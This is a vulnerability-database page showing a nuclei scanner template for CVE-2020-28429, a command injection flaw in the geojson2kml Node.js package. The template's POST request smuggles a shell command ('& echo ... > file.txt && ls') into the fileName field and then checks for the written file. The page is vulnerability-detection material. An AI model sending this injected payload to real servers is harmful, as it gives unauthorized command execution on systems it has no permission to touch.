Lucene search
K

geojson2kml - Command Injection

šŸ—“ļøĀ 03 Jul 2026Ā 03:01:05Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 48Ā Views

Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content. Successful exploitation could result in unauthorized access, remote code execution, privilege escalation. Do not use geojson2kml

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-28429
23 Feb 202118:35
–circl
CNNVD
geojsonkml Command Injection Vulnerability
23 Feb 202100:00
–cnnvd
CVE
CVE-2020-28429
23 Feb 202115:10
–cve
Cvelist
CVE-2020-28429 Command Injection
23 Feb 202115:10
–cvelist
Github Security Blog
Command Injection in geojson2kml
10 May 202115:59
–github
NVD
CVE-2020-28429
23 Feb 202115:15
–nvd
OSV
GHSA-W83X-FP72-P9QC Command Injection in geojson2kml
10 May 202115:59
–osv
Prion
Command injection
23 Feb 202115:15
–prion
Snyk
Command Injection
11 Dec 202014:59
–snyk
Veracode
OS Command Injection
24 Feb 202102:08
–veracode
Rows per page
id: CVE-2020-28429

info:
  name: geojson2kml - Command Injection
  author: eeche,chae1xx1os,persona-twotwo,soonghee2
  severity: critical
  description: |
    Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
  remediation: |
    Do not use geojson2kml. There is no fixed version for geojson2kml.
  reference:
    - https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
    - https://github.com/advisories/GHSA-w83x-fp72-p9qc
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28429
    cwe-id: CWE-78
    epss-score: 0.63305
    epss-percentile: 0.99106
    cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: geojson2kml_project
    product: geojson2kml
    framework: node.js
  tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive,vuln

variables:
  filename: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /convert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",
          "geoJsonData": {
            "type": "FeatureCollection",
            "features": [
              {
                "type": "Feature",
                "geometry": {
                  "type": "Point",
                  "coordinates": [102.0, 0.5]
                },
                "properties": {
                  "prop0": "value0"
                }
              }
            ]
          }
        }

      - |
        GET /file/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: word
        part: header_2
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402203db203cb985e6d94bcf82eacc1471d36d031d0cf6ac6a56b2b3e1846501deed9022060efc824d09f9108ca721f682549f4355a0c6ff676285ab606ae99c3bfee88d8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.17.3 - 9.8
EPSS0.63305
48